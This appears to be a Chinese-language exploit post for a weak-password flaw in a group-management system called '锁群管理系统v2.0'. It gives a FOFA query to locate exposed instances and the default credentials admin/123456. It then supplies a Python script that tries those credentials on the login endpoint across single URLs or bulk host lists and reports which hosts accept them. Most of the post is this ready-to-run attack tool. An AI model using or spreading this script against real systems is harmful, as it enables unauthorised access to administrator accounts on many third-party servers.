# 鎖群管理系統v2.0 弱口令漏洞
==FOFA==
title="锁群管理系统v2.0"
==默認憑據==
用戶名:admin
密碼:123456
==POC==
import requests
import sys
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning #消除警告
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # 消除警告
def lemonlove7():
print('python xxx.py -u/--url http://xxx.xxx.xxx.xxx')
print('python xxx.py -f/--file x.txt')
print('FOFA:title="锁群管理系统v2.0"')
print('lemonlove7')
if len(sys.argv)==1:
lemonlove7()
sys.exit()
p = argparse.ArgumentParser(description='lemonlove7')
p.add_argument('-u','--url',help='输入url',default='')
p.add_argument('-f','--file',help='输入文件',default='')
a = p.parse_args()
url = a.url
file = a.file
headers= {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',
'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'Cookie':'ASP.NET_SessionId=pjb41rehvxilis32hfgus0r5'
}
if url != '':
furl = url
try:
url =furl+'/inc/CheckLogin.aspx?checkLogin=login&un=admin&pw=123456'
r= requests.get(url=url,headers=headers,timeout=10,verify=False)
if r.status_code == 200 and '0' in r.text:
print(furl+'存在弱口令')
else:
print(furl+'不存在弱口令')
except Exception as e:
print(furl+'不存在弱口令')
if file !='':
text =file
f = open(text,'r+')
for i in f.readlines():
url = i.strip()
if url.startswith('http:') != 1 and url.startswith('https:') != 1:
url = 'http://' + url
url1 = url
url2=url
try:
url1 = url+'/inc/CheckLogin.aspx?checkLogin=login&un=admin&pw=123456'
r =requests.post(url=url1,headers=headers,timeout = 10,verify=False)
if r.status_code==200 and '0' in r.text:
print(url2+'存在弱口令')
else:
print(url2+'不存在弱口令')
except Exception as e:
print(url2+'不存在弱口令')
==參考==
https://mp.weixin.qq.com/s/Xu0_SCMwhCR9Bx7mo8v1kw
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容